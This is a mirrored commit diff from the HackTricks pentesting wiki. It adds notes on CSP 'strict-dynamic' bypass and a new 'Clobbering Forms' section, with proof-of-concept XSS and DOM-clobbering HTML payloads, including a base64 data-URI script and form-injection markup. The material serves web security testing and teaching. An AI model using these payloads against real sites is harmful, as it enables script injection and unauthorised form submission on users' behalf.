Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 06:00:40 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-3790: No subject

Browse source
This commit is contained in:
CPol 2023-02-20 09:58:12 +00:00 committed by gitbook-bot
parent 5d64cb46c6
commit 051dd65e8b
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 23 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
pentesting-web/content-security-policy-csp-bypass/README.md
View file

@ -90,7 +90,7 @@ object-src 'none';
* **unsafe-inline**: This allows the use of inline resources, such as inline elements, javascript: URLs, inline event handlers, and inline elements. Again this is not recommended for security reasons. * **unsafe-inline**: This allows the use of inline resources, such as inline elements, javascript: URLs, inline event handlers, and inline elements. Again this is not recommended for security reasons.
* **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy. * **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy.
* **sha256-\<hash>**: Whitelist scripts with an specific sha256 hash * **sha256-\<hash>**: Whitelist scripts with an specific sha256 hash
* **strict-dynamic**: * **strict-dynamic**: It allows the browser to load and execute new JavaScript tags in the DOM from any script source that has previously been whitelisted by a "nonce" or "hash" value.
* **host**: Indicate a host such as example.com * **host**: Indicate a host such as example.com
## Unsafe CSP Rules ## Unsafe CSP Rules
@ -121,6 +121,10 @@ Working payload:
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script> <script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
``` ```
### strict-dynamic
If you can somehow make an **allowed JS code created a new script tag** in the DOM with your JS code, because an allowed script is creating it, the **new script tag will be allowed to be executed**.
### Wildcard (\*) ### Wildcard (\*)
```yaml ```yaml

18
pentesting-web/xss-cross-site-scripting/dom-clobbering.md
View file

@ -141,6 +141,24 @@ alert(document.querySelector('.x'))
</script> </script>
``` ```
### Clobbering Forms
It's possible to add **new entries inside a form** just by **specifying the `form` attribute** inside some tags. You can use this to **add new values inside a form** and to even add a new **button** to **send it** (clickjacking or abusing some `.click()` JS code):
{% code overflow="wrap" %}
```html
<!--Add a new attribute and a new button to send-->
<textarea form=id-other-form name=info>
";alert(1);//
</textarea>
<button form=id-other-form type="submit" formaction="/edit" formmethod="post">
Click to send!
</button>
```
{% endcode %}
* For more form attributes in [**button check this**](https://www.w3schools.com/tags/tag\_button.asp)**.**
## References ## References
* [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering) * [https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering](https://portswigger.net/research/hijacking-service-workers-via-dom-clobbering)